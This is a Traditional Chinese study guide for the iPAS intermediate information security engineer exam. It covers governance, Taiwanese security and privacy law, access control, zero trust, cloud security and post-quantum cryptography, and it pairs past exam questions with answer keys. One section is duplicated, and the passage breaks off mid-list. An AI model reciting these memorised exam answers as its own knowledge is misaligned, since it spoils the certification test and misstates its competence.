# iPAS 資訊安全工程師中級 考試重點整理 > **📌 使用說明** > > 本筆記係參考 iPAS 資訊安全工程師中級考試大綱，並採用 114 年度考題回推整理。 > > **閱讀前提**： > - 中級考試假設初級內容已熟悉，基礎定義不重複整理，請參考 [初級筆記](https://hackmd.io/sHxDiOd3S-Syj4PZPRWM9Q) > - 中級範圍廣泛，建議至少研讀近三年考古題，而非僅看一年 > > **收錄原則**： > - 常考、重要的觀念會整理成筆記 > - 冷門攻擊手法或單一年度出現的細節題，僅保留考題供參考，不另作筆記 > - 本筆記以 **70 分及格** 為目標編寫，非滿分導向 > > **參考資源**： > - [考試大綱（115 年度簡章）](https://www.ipas.org.tw/ISE) > - [歷年考題](https://ipd.nat.gov.tw/ipas/certification/ISE/learning-resources) --- [TOC] --- # 第一科：資訊安全規劃實務 --- ## 1.1 資訊安全管理系統建置實務與法規遵循 ### CIA 三要素 | 要素 | 定義 | 破壞情境範例 | 常見控制措施 | |:-----|:-----|:-------------|:-------------| | 機密性（C） | 資料不被未授權存取 | 帳號被盜、資料外洩 | MFA、加密（TLS）、存取控制、定期改密碼 | | 完整性（I） | 資料不被未授權修改 | SQL Injection 竄改、勒索軟體加密 | 雜湊驗證、數位簽章、輸入驗證 | | 可用性（A） | 資料/服務可被正常使用 | DDoS、系統當機 | 備援機制、負載平衡、備份 | ### ISO 27001:2022 架構 | 項目 | 內容 | |------|------| | 控制項數量 | 93 項（原 2013 版為 114 項） | | 四大主題 | 組織 37、人員 8、實體 14、技術 34 | | 屬性標籤 | 控制類型（預防/偵測/矯正）、資安特性（CIA）、網路安全概念（識別/保護/偵測/回應/復原） | **ISMS 溝通要素**：溝通事項、溝通對象、溝通方式、溝通時機 **ISO 27001 vs ISO 27002**： - 27001：要求標準（可驗證），規定「必須做什麼」 - 27002：指引標準（參考用），說明「如何做」 ### 資通安全管理法 **事件通報與復原時限**： | 事件等級 | 通報時限 | 損害控制/復原時限 | |----------|----------|-------------------| | 1、2 級（較輕） | 1 小時內 | 72 小時內 | | 3、4 級（較重） | 1 小時內 | 36 小時內 | **日誌保存期限**：至少 6 個月（等級「普」以上） **委外選任查核重點（資通安全管理法第 10 條）** | 查核項目 | 重點 | |:---------|:-----| | 人員資格 | 資安專業證照、資安訓練、類似業務經驗 | | 複委託 | 是否允許、範圍、對象、受託者資安維護措施 | | 國家機密 | 適任性查核、出境管制 | | 客製化開發 | 安全性檢測證明；核心系統或金額 ≥1000 萬須第三方檢測 | | 事件通報 | 違規或資安事件須立即通知委託機關 | | 契約終止 | 資料返還、移交、刪除或銷毀 | | 定期稽核 | 委託機關應定期確認執行情形 | ### 個人資料保護法 - 蒐集前須告知：機關名稱、蒐集目的、資料類別、利用期間/地區/對象/方式、當事人權利 - 不得要求當事人放棄法定權利（如申請複製本的權利） - 須採行適當安全措施防止個資被竊取、竄改、毀損、滅失或洩漏 ### 上市櫃公司資通安全管控指引 | 項目 | 要求 | |:-----|:-----| | 政策核定層級 | 副總級以上 | | 專責人員 | 須設置資安專責人員 | | 教育訓練 | 落實至每一位成員，並有稽核制度 | **重大資安事件揭露判斷**： - 媒體報導，可能影響投資人決策 - 核心系統/官網無法營運 - 個資/內部文件外洩之虞 - 財務損失可能影響投資決策 ### 其他重要法規 | 法規 | 適用對象 | 重點 | | :--- | :--- | :--- | | **GDPR** | 處理歐盟居民個資的組織 | 不限於歐盟境內公司 | | **HIPAA** | 醫療機構、保險業及相關業務夥伴 | 美國法案，保護「個人醫療健康資訊」(PHI) | | **PCI DSS** | 處理信用卡資訊的組織 | 持卡人資料保護 | | **ISO 27701** | 需個資保護管理的組織 | ISO 27001 延伸，隱私資訊管理（PIMS） | | **BS 10012** | 需個資保護管理的組織 | 英國標準，個人資訊管理 | --- ### 114 年考題補充 > **Q：** 【題組 1】情境如附圖所示，甲金融機構（屬資通安全管理法規範對象）於本開發案起案前對於受託者之選任作業，下列何者最「不」適切？ > > **情境**：A 公司主要核心業務係提供國內各大金融機構（均屬資通安全管理法規範對象）有關系統之客製化開發業務，合作夥伴 B 公司為長年承接 A 公司所下包有關金融機構委託業務。甲為國內首屈一指之金融機構，今有一金融系統委外開發專案需求，此專案為一大型系統開發案，包含委外開發 W 核心系統、X 系統（資通系統防護需求等級為高級）、Y 系統（資通系統防護需求等級為中級）以及 Z 系統（資通系統防護需求等級為普級）各乙式，委託金額為新台幣捌佰捌拾萬元整，專案開發為期一年。 > > - \(A\) 確認受託者配置充足且經適當之資格訓練之人員執行受託業務 > - \(B\) 確認受託者擁有 ISO 9001 專業證照 > - \(C\) 確認受託者具有類似業務經驗之資通安全專業人員 > - \(D\) 確認受託者具備完善之資通安全管理措施 <details> <summary>查看答案</summary> **\(B\) 確認受託者擁有 ISO 9001 專業證照** ISO 9001 是品質管理標準，不是資安證照。法規要求的是「資通安全專業證照」。 </details> --- > **Q：** 【題組 2】情境如附圖所示，依據我國上市上櫃公司資通安全控管指引，為協助公司強化資通安全防護及管理機制，於該指引中明規定必須設置專責人員訂定資通安全政策及目標。本題明文要求必須由公司內部那一個職務以上核定政策及目標？ > > **情境**：在準備上市公司的董事會會議中，資通安全是議程的重點。此次會議主要討論如何加強公司的資通安全防護及管理機制、應對生成式 AI 的威脅，以及了解最新的資安框架更新如何融入公司治理之中。資通安全主管向董事會介紹了我國上市上櫃公司資通安全控管指引，強調該指引要求設置專責人員負責訂定資通安全政策及目標。其中一位董事成員提出了生成式 AI 在攻擊中的利用，指出生成式 AI 已成為攻擊者的利器之一，資通安全主管解釋了這一技術的戰術進程，並強調公司需要強化對此類威脅的防護措施。在外部議題討論時外部顧問提到美國國家標準技術研究院（NIST）創建的網路安全框架（Cyber Security Framework，CSF）在 2024 年 3 月公佈了最新的 2.0 版，資通安全主管提到其 CSF 改版的差別，將功能從原有的 5 個主要功能擴增為 6 大主要功能。新的管理功能不僅加強了原有的 5 個功能，還使 CSF 在資源配置上更具效率，最終管理部門，針對市櫃公司引導中的人員教育訓練應落實至公司的每一位成員，並且應有其核核的制度，確保教育訓練的有效性。身為資通安全主管的你，應該如何面對這些議題。 > > - \(A\) 監察人 > - \(B\) 資訊主管 > - \(C\) 董事 > - \(D\) 副總級 <details> <summary>查看答案</summary> **\(D\) 副總級** 依上市上櫃公司資通安全控管指引，資通安全政策及目標須由**副總級以上**核定。 </details> --- > **Q：** 【題組 1】情境如附圖所示，A 公司今成功承攬甲金融機構（屬資通安全管理法規範對象）所委託之系統開發案，因案量過大，故 A 公司一如以往，擬尋求合作夥伴 B 公司執行本案之部分系統開發業務，並尋求取得甲金融機構之同意。有關甲金融機構就 A 公司辦理受託業務之複委託事項，其應注意之事項，下列說明何者最「不」適切？ > > **情境**：A 公司主要核心業務係提供國內各大金融機構（均屬資通安全管理法規範對象）有關系統之客製化開發業務，合作夥伴 B 公司為長年承接 A 公司所下包有關金融機構委託業務。甲為國內首屈一指之金融機構，今有一金融系統委外開發專案需求，此專案為一大型系統開發案，包含委外開發 W 核心系統、X 系統（資通系統防護需求等級為高級）、Y 系統（資通系統防護需求等級為中級）以及 Z 系統（資通系統防護需求等級為普級）各乙式，委託金額為新台幣捌佰捌拾萬元整，專案開發為期一年。 > > - \(A\) 複委託之範圍 > - \(B\) 複委託之對象 > - \(C\) 複委託之金額 > - \(D\) 複委託之受託者應具備之資通安全維護措施 <details> <summary>查看答案</summary> **\(C\) 複委託之金額** 法規規定複委託應注意：是否允許、範圍、對象、受託者資安維護措施。沒有「金額」。 </details> --- > **Q：** 【題組 1】情境如附圖所示，A 公司承攬甲金融機構（屬資通安全管理法規範對象）所委託之系統開發案，B 公司受 A 公司之複委託，辦理部份系統開發業務，且 B 公司所負責之 Y 系統，部份系統程式碼係取自外部第三方所開發之程式碼。下列說明何者最適切？ > > **情境**：A 公司主要核心業務係提供國內各大金融機構（均屬資通安全管理法規範對象）有關系統之客製化開發業務，合作夥伴 B 公司為長年承接 A 公司所下包有關金融機構委託業務。甲為國內首屈一指之金融機構，今有一金融系統委外開發專案需求，此專案為一大型系統開發案，包含委外開發 W 核心系統、X 系統（資通系統防護需求等級為高級）、Y 系統（資通系統防護需求等級為中級）以及 Z 系統（資通系統防護需求等級為普級）各乙式，委託金額為新台幣捌佰捌拾萬元整，專案開發為期一年。 > > - \(A\) 受託業務之委託金額未達新台幣一千萬元以上，故無需辦理安全性檢測 > - \(B\) 本案應由 B 公司負責提供安全性檢測證明 > - \(C\) 甲金融機構自行或另行委託第三方進行安全性檢測 > - \(D\) 應標示 B 公司非自行開發之內容，但無須提供其來源及提供授權證明 <details> <summary>查看答案</summary> **\(C\) 甲金融機構自行或另行委託第三方進行安全性檢測** - A 錯：雖然金額未達 1000 萬，但有「核心系統」，條件是「或」，仍須第三方檢測 - B 錯：第三方檢測是委託機關（甲）的責任，不是受託者（B） - C 對：核心系統須由委託機關自行或委託第三方檢測 - D 錯：非自行開發須標示內容「與其來源及提供授權證明」 </details> --- > **Q：** 【題組 1】情境如附圖所示，A 公司承攬甲金融機構（屬資通安全管理法規範對象）所委託之系統開發案，B 公司受 A 公司之複委託，辦理部份系統開發業務，B 公司於開發所負責之 Y 系統過程中，系統開發工程師將開發區之電腦私自連接外部網路，因故導致該電腦受駭客攻擊，造成部份系統程式碼外洩之重大資通安全事件。關於此資通安全事件之處置下列哪些最適切？（複選） > > **情境**：A 公司主要核心業務係提供國內各大金融機構（均屬資通安全管理法規範對象）有關系統之客製化開發業務，合作夥伴 B 公司為長年承接 A 公司所下包有關金融機構委託業務。甲為國內首屈一指之金融機構，今有一金融系統委外開發專案需求，此專案為一大型系統開發案，包含委外開發 W 核心系統、X 系統（資通系統防護需求等級為高級）、Y 系統（資通系統防護需求等級為中級）以及 Z 系統（資通系統防護需求等級為普級）各乙式，委託金額為新台幣捌佰捌拾萬元整，專案開發為期一年。 > > - \(A\) 辦理對 B 公司網路維護工程師之適任性查核 > - \(B\) B 公司通報 A 公司並通知甲金融機構資通安全事件 > - \(C\) B 公司採行補救措施 > - \(D\) 甲金融機構決議解除複委託業務，確認複委託之受託者返還、移交、刪除或銷毀履行契約而持有之資料 <details> <summary>查看答案</summary> **\(B\)\(C\)\(D\)** - A 錯：適任性查核是針對「涉及國家機密」的情況，本案是金融機構，非國家機密 - B 對：對應「事件通報」—違規或資安事件須立即通知委託機關 - C 對：發生事件應採行補救措施 - D 對：對應「契約終止」—資料返還、移交、刪除或銷毀 </details> --- > **Q：** 【題組 2】情境如附圖所示，下列那些選項描述的狀況，何者符合資安三要素中完整性的特性？（複選） > > **情境**：（同題組 2） > > - \(A\) 人員到職後，因預設密碼未進行變更，該員的帳號被登入並且外洩了公司的資料 > - \(B\) 公司執行資安檢測時，發現 SQL Injection 的問題，變更部分資料庫內容 > - \(C\) 公司的電子郵件中透過應透過憑證進行電子郵件加密 > - \(D\) 因使用者資安意識不足，點擊了勒索軟體，以致部分文件內容無法讀取 <details> <summary>查看答案</summary> **\(B\)\(D\)** - A：帳號被盜、資料外洩 → 機密性 - B：SQL Injection 變更資料 → 完整性 ✓ - C：加密保護 → 機密性 - D：勒索軟體加密文件，內容被改變 → 完整性 ✓ </details> --- > **Q：** 【題組 3】情境如附圖所示。建置網路販售系統時，公司考量該系統之機密性、可用性、完整性規劃了相關控制項目，請問下列何項系統建置規劃「不」屬機密性之考量？ > > **情境**：K 公司為國內股票上市食品之製造商，公司新建置網路販售系統，將產品直接銷售給國內的消費者，並暫時不提供將所販售產品寄到本國以外的地區。 > > - \(A\) 規定使用多因子認證登入系統 > - \(B\) 要求定期更改密碼 > - \(C\) 建置即時系統備援機制 > - \(D\) 使用 TLS 1.3（Transport Layer Security）加密通訊協定 <details> <summary>查看答案</summary> **\(C\) 建置即時系統備援機制** - A、B、D：保護資料不被未授權存取 → 機密性 - C：確保系統持續運作 → 可用性 </details> --- > **Q：** 【題組 3】情境如附圖所示。網路販售系統上線 6 個月後，公司收到證券主管機關通知大量會員資料被人於國外網站上架販售。請問發生此個資外洩事件，公司於回應此資安事件時，須注意下列哪些法令規章？（複選） > > **情境**：K 公司為國內股票上市食品之製造商，公司新建置網路販售系統，將產品直接銷售給國內的消費者，並暫時不提供將所販售產品寄到本國以外的地區。 > > - \(A\) 電腦處理個人資料保護法 > - \(B\) 上市上櫃公司資通安全管控指引 > - \(C\) 個人資料保護法 > - \(D\) 食品安全衛生管理法 <details> <summary>查看答案</summary> **\(B\)\(C\)** - A 錯：舊法，已被「個人資料保護法」取代 - B 對：K 公司是上市公司，重大資安事件須依指引揭露 - C 對：個資外洩須遵循個資法 - D 錯：食品安全法規，與個資外洩無關 </details> --- > **Q：** 公司取得應徵人員的個人資料時，下列何項行為違反個人資料保護法？ > - \(A\) 說明取得資料之使用期限 > - \(B\) 請其放棄申請其個人資料複製本之權利 > - \(C\) 說明個人資料的使用對象 > - \(D\) 告知個人資料使用之方式 <details> <summary>查看答案</summary> **\(B\) 請其放棄申請其個人資料複製本之權利** 個資法規定不得要求當事人放棄法定權利，申請複製本是當事人的法定權利。 </details> --- > **Q：** 近年資通安全事件與日俱增，為使上市公司充分揭露重大資安事件，保障投資人知的權利，證交所已修訂重大訊息問答集明確規範資安事件之「重大性」標準。關於造成公司重大損害或影響之描述，下列哪些最正確？（複選） > - \(A\) 媒體報導公司發生資通安全事件，可能影響投資人之投資決策 > - \(B\) 僅公司核心資通系統、官方網站等，遭駭客攻擊入侵致無法營運或正常提供服務 > - \(C\) 公司有個資、內部文件檔案資料外洩之虞等情事 > - \(D\) 公司對造成損害或影響之評估結果（如財務損失），可能影響投資人之投資決策 <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** - A 對：媒體報導可能影響投資決策 - B 錯：「僅」字有問題，不只核心系統，其他情況也可能需揭露 - C 對：個資/內部文件外洩之虞 - D 對：財務損失可能影響投資決策 </details> --- > **Q：** 【題組 1】情境如附圖所示。身為該醫療中心的資安長（CISO），情境在發現勒索軟體活動的當下，根據台灣《資通安全管理法》的規定，您的團隊第一小時內最優先的法定應辦事項為下列何項？ > > **情境**：一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統（EHR）」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。 > > - \(A\) 立即支付勒索贖金以最快速度回復系統，避免影響病患照護 > - \(B\) 全面斷開醫院對外網路，阻止威脅擴散並進行內部損害評估 > - \(C\) 依據事件分級，完成初步損害評估與判斷，並於一小時內通報主管機關 > - \(D\) 召集所有資訊人員，優先搶救被加密的電子病歷資料庫 <details> <summary>查看答案</summary> **\(C\) 依據事件分級，完成初步損害評估與判斷，並於一小時內通報主管機關** 資通安全管理法規定：知悉事件後 **1 小時內**須完成初步分級/損害判斷並通報。 - A 錯：不應支付贖金 - B 錯：斷網是技術處置，但「法定應辦」優先是通報 - D 錯：搶救是後續動作，不是第一小時法定優先事項 </details> --- > **Q：** 【題組 3】情境如附圖所示。國內總公司因應海外客戶的要求，其特別重視個資保護，故要求公司需要通過 ISO 27701 隱私資訊安全驗證，請問下列何項措施最「不」適切？ > > **情境**：某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。 > > - \(A\) 審視 ISO/IEC 27001 資訊安全管理驗證的範圍是否符合需求 > - \(B\) 積極尋求通過 BS 10012 個人資訊管理驗證 > - \(C\) 選擇業務部門優先導入 ISO/IEC 27701 資訊安全管理驗證 > - \(D\) 選擇生產基地優先導入 ISO/IEC 27701 資訊安全管理驗證 <details> <summary>查看答案</summary> **\(B\) 積極尋求通過 BS 10012 個人資訊管理驗證** - A 對：ISO 27701 以 ISO 27001 為基礎，須先確認 27001 範圍 - B 錯：BS 10012 是英國標準，與題目要求的 ISO 27701 不同 - C 對：業務部門處理客戶個資，優先導入合理 - D 對：生產基地可能有員工個資，優先導入也合理 </details> --- > **Q：** 進行電子郵件系統風險評估時，下列哪些選項為可用性評估的考量因素？（複選） > - \(A\) 電子郵件系統的備援方式 > - \(B\) 最適可用人數的評估 > - \(C\) 電子郵件系統管理者登入密碼之管制方式 > - \(D\) 電子郵件系統負載平衡運作方式 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：備援 → 確保系統持續運作 → 可用性 - B 對：可用人數評估 → 容量規劃 → 可用性 - C 錯：密碼管制 → 防止未授權存取 → **機密性** - D 對：負載平衡 → 確保服務不中斷 → 可用性 </details> --- > **Q：** 【題組 2】情境如附圖所示。當資安人員進行風險評鑑與處理時，接獲內部人員通報發生勒索病毒感染之資通安全事件，該事件已造成檔案交換主機（未涉及關鍵基礎設施維運）內的檔案遭加密無法開啟，系統亦無法正常使用，影響了核心業務的正常運作且無法於可容忍中斷時間內回復正常運作。試問有關資安人員對於此一事件處理之作為，下列何者錯誤？ > > **情境**：A 公司為一金融機構（資通安全責任等級 A 級），近期因為駭客攻擊事件頻仍，因此該公司資安長要求內部必須針對目前外在資安環境以及內部資訊資產的變化，重新檢視與評估潛在的風險並於以適切之處理，以確保該公司的資訊安全。 > > - \(A\) 一小時內通報金管會 > - \(B\) 資通安全事件等級判斷為二級 > - \(C\) 對該檔案交換主機進行隔離 > - \(D\) 建議資安長啟動該核心業務之業務持續計畫 <details> <summary>查看答案</summary> **\(B\) 資通安全事件等級判斷為二級** - A 對：所有事件都須 1 小時內通報 - B 錯：「影響核心業務」且「無法於可容忍中斷時間內回復」→ 應為 3 或 4 級（較重），非 2 級 - C 對：遏制措施，防止擴散 - D 對：核心業務受影響，應啟動 BCP </details> --- ## 1.2 資安管理實務：存取控制、縱深防禦、職務區隔 (SOD) ### 存取控制模型 | 模型 | 特性 | 適用情境 | |------|------|----------| | DAC（自主式） | 資源擁有者決定權限 | 一般作業系統 | | MAC（強制式） | 系統依標籤強制控制 | 軍事、機密系統 | | RBAC（角色式） | 依角色指派權限 | 企業應用 | | ABAC（屬性式） | 依主體/環境/客體屬性動態決定 | 複雜環境、雲端 | **ABAC 屬性範例**：登入時間、地理位置、設備合規狀態、使用者部門 ### 認證因素 | 因素 | 類型 | 範例 | |:-----|:-----|:-----| | 知識因素 | 你知道什麼 | 密碼、PIN | | 持有因素 | 你擁有什麼 | 智慧卡、Token | | 生物因素 | 你是什麼 | 指紋、虹膜 | **MFA（多因子認證）**：結合兩種以上不同類型的認證因素 **Adaptive MFA（適應性多因子認證）**：根據風險評估（如登入地點、設備、行為）動態調整認證強度 **生物辨識指標**： - FAR（False Accept Rate）：錯誤接受率 - FRR（False Reject Rate）：錯誤拒絕率（Type-I Error） - CER（Crossover Error Rate）：交叉錯誤率，FAR = FRR 的點 **生物辨識指標**： - FAR（False Accept Rate）：錯誤接受率 - FRR（False Reject Rate）：錯誤拒絕率（Type-I Error） - CER（Crossover Error Rate）：交叉錯誤率，FAR = FRR 的點 ### 特權帳號管理（PAM） - 高權限帳號實施二次驗證 - 行為稽核與留痕 - 提權需核准 ### 縱深防禦（Defense in Depth） 又稱「分層式安全性」，多層次保護，**不依賴單一產品或防線**： 1. 實體安全 2. 網路區隔 3. 主機強化 4. 應用程式防護 5. 資料加密 ### 職務區隔（SOD） 確保以下由不同人員擔任： - 申請與核准 - 開發與維運 - 執行與稽核 **有助於 SOD 的措施**：職務輪調、RBAC、定期權限審查 **小型組織無法完全實施時的補償措施**： - 活動監視 - 稽核存底 - 管理監督 --- ### 114 年考題補充 > **Q：** 下列關於「縱深防禦」的描述，何者較「不」合適？ > - \(A\) 縱深防禦是一種網路安全策略，它使用多種安全產品和做法來保護組織的網路、Web 資產和資源 > - \(B\) 縱深防禦有時與「分層式安全性」一詞互換使用，因為它依賴於多個控制層（實體、技術和管理）的安全解決方案 > - \(C\) 縱深防禦透過實作多種安全產品和做法可以幫助偵測和阻止出現的攻擊，使組織能夠有效地緩解各種威脅 > - \(D\) 縱深防禦安全策略中，運用一個功能強大的產品來阻止攻擊者和其他威脅 <details> <summary>查看答案</summary> **\(D\) 縱深防禦安全策略中，運用一個功能強大的產品來阻止攻擊者和其他威脅** 縱深防禦核心是「多層次」，不依賴單一產品。 </details> --- > **Q：** 設計職務區隔（SoD）控制措施時，宜考量共謀之可能性。小型組織可能發現難以實施職務區隔，但於可能及可行之情況下，宜儘可能使用此原則。難以區隔職務時，宜考量採行相關控制措施來輔助，下列何者控制措施較「不」適切？ > - \(A\) 全權負責 > - \(B\) 活動監視 > - \(C\) 稽核存底 > - \(D\) 管理監督 <details> <summary>查看答案</summary> **\(A\) 全權負責** 「全權負責」是讓一個人負責所有事情，正是 SOD 要避免的情況，不是補償措施。 </details> --- > **Q：** 【題組 1】情境如附圖所示。身為該醫療中心的資安長（CISO），為了建構一個同時兼具彈性與韌性的安全防護體系，防止此類結合供應鏈與內部人員的攻擊再次發生，下列哪些安全架構與管理措施應被納入改善計畫？（複選） > > **情境**：一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統（EHR）」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。 > > - \(A\) 在所有端點（包含開發者筆電）部署端點偵測與應變（Endpoint Detection and Response, EDR）系統 > - \(B\) 制定並落實嚴格的特權存取管理（Privileged Access Management, PAM）政策，採最小權限原則 > - \(C\) 為所有關鍵系統（如 EHR）的存取啟用基於風險評估的適應性多因子認證（Adaptive MFA） > - \(D\) 要求所有遠端工作模式，均需配置單向閘道傳輸器，以確保作業安全 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：EDR 可偵測端點異常行為（如惡意 AI 工具） - B 對：PAM 最小權限，限制攻擊擴散範圍 - C 對：Adaptive MFA 根據風險動態調整認證強度 - D 錯：單向閘道傳輸器（Data Diode）適用於特定高安全環境，不是所有遠端工作都適用 </details> --- > **Q：** 某企業為防止內部人員濫用權限，設計了資訊系統的權限分工制度。下列何項作法「最符合」職務區隔（Separation of Duties, SOD）之原則？ > - \(A\) 系統管理員擁有新增、查詢、刪除與審核所有交易紀錄的權限 > - \(B\) 員工可依需求申請額外權限，經由直屬主管自動核准後立即生效 > - \(C\) 部門主管在系統中直接新增自己以及下屬之出勤與加班紀錄，並同時進行審核 > - \(D\) 資料輸入作業由 A 員工負責，資料審核與最終送出作業由 B 員工執行 <details> <summary>查看答案</summary> **\(D\) 資料輸入作業由 A 員工負責，資料審核與最終送出作業由 B 員工執行** SOD 核心是「執行與審核分開」： - A 錯：一人擁有所有權限，違反 SOD - B 錯：「自動核准」等於沒有審核 - C 錯：同一人新增和審核，違反 SOD - D 對：輸入和審核由不同人負責 </details> --- > **Q：** 在規劃企業資安的縱深防禦過程中，需要使用各種不同的技術與產品來應對不同情境的資安議題，下列哪一種技術最適合用來避免「內部資料被未經授權地傳輸到外部」的情況？ > - \(A\) 網路流量分析與回應（Network Detection and Response，NDR） > - \(B\) 內容傳遞網路（Content Delivery Network，CDN） > - \(C\) 入侵偵測系統（Intrusion Detection System，IDS） > - \(D\) 資料外洩防護（Data Loss Prevention，DLP） <details> <summary>查看答案</summary> **\(D\) 資料外洩防護（Data Loss Prevention，DLP）** - NDR：偵測網路異常流量，不專門防止資料外洩 - CDN：加速內容傳遞，與資安無關 - IDS：偵測入侵行為，非防止資料外洩 - DLP：專門防止敏感資料未經授權傳輸到外部 </details> --- ## 1.3 安全架構規劃實務 ### 零信任架構（ZTA） **核心原則**：永不信任，持續驗證 > ⚠️ ZTA 目前仍在推廣階段，尚未廣為採用 **NIST SP 800-207 核心假設**： - 內部網路不可視為隱式信任區 - 內部設備可能非企業所有或管控 - 任何網路連線（含遠距）皆不可完全信任 - 跨環境移動時須維持一致安全標準 **核心元件**： - PEP（Policy Enforcement Point）：政策執行點 - PDP（Policy Decision Point）：政策決策點 **ZTA 信任評等考量因素**： - 資產狀態（設備合規、健康狀態） - 資源內容（存取的資源類型與敏感度） - 環境因素（時間、地點、網路位置） **CISA ZTA 五大支柱**： | 支柱 | 說明 | 控制範例 | |:-----|:-----|:---------| | Identity（身分） | 身分驗證與管理 | MFA、IAM | | Devices（設備） | 設備信任與合規 | 設備辨識、MDM | | Networks（網路） | 網路存取控制 | 微隔離、RDP 白名單 | | Applications & Workloads（應用程式） | 應用程式安全 | API 安全、容器安全 | | Data（資料） | 資料保護 | DLP、加密 | **橫向能力**： - Visibility and Analytics（可視性與分析） - Automation and Orchestration（自動化與編排） - Governance（治理） **ZTA 成熟度模型（CISA）**： | 階段 | 特性 | |:-----|:-----| | 傳統 | 邊界防護為主 | | 起始 | 開始導入零信任概念 | | 進階 | 部分自動化、融入動態指標 | | 最佳化 | 自動化政策執行、即時偵測回應 | > 金管會《金融業導入零信任架構參考指引》（2024）參考 CISA 模型，分為四級（Level I-IV） ### NIST CSF 2.0 六大功能： 1. **Govern（治理）**：高層責任、資安納入整體風險管理 2. Identify（識別） 3. Protect（保護） 4. Detect（偵測） 5. Respond（回應） 6. Recover（復原） ### 供應鏈安全 **SBOM（軟體物料清單）**： - 用途：管理第三方套件漏洞 - 常見格式：SPDX、CycloneDX **委外管理重點**： - 合約明定資安要求 - 事件通報鏈 - 資料返還/刪除/銷毀 - 受託者資安能力審查 **遠端存取安全措施**： | 措施 | 說明 | |:-----|:-----| | MFA | 多重身份驗證 | | VPN | 加密通道存取控制 | | DLP | 防止資料外洩（但無法單獨完成個資保護） | | 傳輸加密 | 保護營業秘密 | ### OT/ICS 安全 **相關標準**：ISO/IEC 62443、NIST SP 800-82 **IT/OT 環境設計原則**： | 原則 | 說明 | |:-----|:-----| | 網路區隔 | IT 環境與 OT 環境必須區隔 | | 獨立基礎設施 | 不共用目錄服務、檔案伺服器 | | 持續更新 | OT 環境仍須更新修補弱點 | **OT 環境導入 ZTA 的挑戰**： - 老舊 ICS 設備不支援現代化身分驗證協定（如 MFA、SAML） - 設備生命週期長（10-20 年），難以汰換 ### 雲端安全責任分配 | 模式 | 客戶負責 | 雲端商負責 | |------|----------|------------| | IaaS | OS（含 Patch）以上全部 | 硬體、虛擬化 | | PaaS | 應用程式、資料 | OS、中介軟體 | | SaaS | 資料、帳號設定 | 所有技術層 | **雲端安全常見威脅（CSA Top Threats）** | 威脅 | 對應控制方向 | |:-----|:-------------| | 配置錯誤與變更控制不足 | 組態管理、變更管理 | | 身分與存取管理（IAM）問題 | 最小權限、MFA | | 不安全的介面與 API | API 安全、輸入驗證 | | 雲端安全策略缺失 | 制定雲端安全政策 | | 不安全的第三方資源 | 供應鏈管理、SBOM | | 不安全的軟體開發 | SDLC、安全編碼 | | 意外的雲端資料洩露 | DLP、加密、存取控制 | | 系統漏洞 | 弱點掃描、修補管理 | | 雲可見性/可觀測性不足 | 日誌、監控、SIEM | | 未驗證的資源共享 | 存取控制、隔離 | | APT | 縱深防禦、威脅偵測 | **雲端安全工具** **CNAPP（Cloud-Native Application Protection Platform）**：雲原生應用程式保護平台，整合多種雲端安全功能 | 工具 | 全稱 | 功能 | |:-----|:-----|:-----| | CSPM | Cloud Security Posture Management | 雲端安全態勢管理，檢查雲端配置是否符合安全基準 | | CWPP | Cloud Workload Protection Platform | 雲端工作負載保護，保護 VM、容器、無伺服器 | | CIEM | Cloud Infrastructure Entitlement Management | 雲端授權管理，管理雲端身分與權限 | > CNAPP = CSPM + CWPP + CIEM 的整合平台 ### 後量子密碼學（PQC） **定義**：利用現有傳統電腦（CPU、記憶體）即可運行，能抵禦量子電腦攻擊的加密演算法 **量子運算對密碼學的影響**： | 類型 | 影響 | 原因 | |:-----|:-----|:-----| | 對稱式加密 | 安全性減半 | Grover 演算法（AES-256 → 等效 AES-128） | | 非對稱式加密 | 可被破解 | Shor 演算法（RSA、ECC 皆受影響） | **威脅**：「先擷取後解密（Harvest Now, Decrypt Later）」— 攻擊者現在蒐集加密資料，等量子電腦成熟後解密 **應對策略**： - 混合加密模式：同時使用傳統演算法 + PQC 演算法 - 採用標準化 PQC 演算法（如 NIST 標準化的） **注意事項**： - 避免使用未經驗證的「專有」抗量子演算法 - 長期保密資料（如專利、設計圖）應優先評估 ### AI 安全與治理 **ISO 42001**：人工智慧管理系統（AIMS），用於組織 AI 治理與風險管理 **LLM/生成式 AI 安全** OWASP Top 10 for LLM（2025）： | 排名 | 風險 | |:-----|:-----| | LLM01 | Prompt Injection（提示注入） | | LLM02 | Sensitive Information Disclosure（敏感資訊洩露） | | LLM03 | Supply Chain（供應鏈風險） | | LLM04 | Data and Model Poisoning（資料與模型污染） | | LLM05 | Improper Output Handling（不當輸出處理） | | LLM06 | Excessive Agency（過度授權） | | LLM07 | System Prompt Leakage（系統提示洩露） | | LLM08 | Vector and Embedding Weaknesses（向量與嵌入弱點） | | LLM09 | Misinformation（錯誤資訊） | | LLM10 | Unbounded Consumption（無限制資源消耗） | **企業使用 LLM 控制措施**： - 清查並限制非核可的 LLM 服務 - WAF 限制程式片段上傳 - 雲端 API 連結確認與管理 - DLP 防止敏感資訊外洩 - RBAC 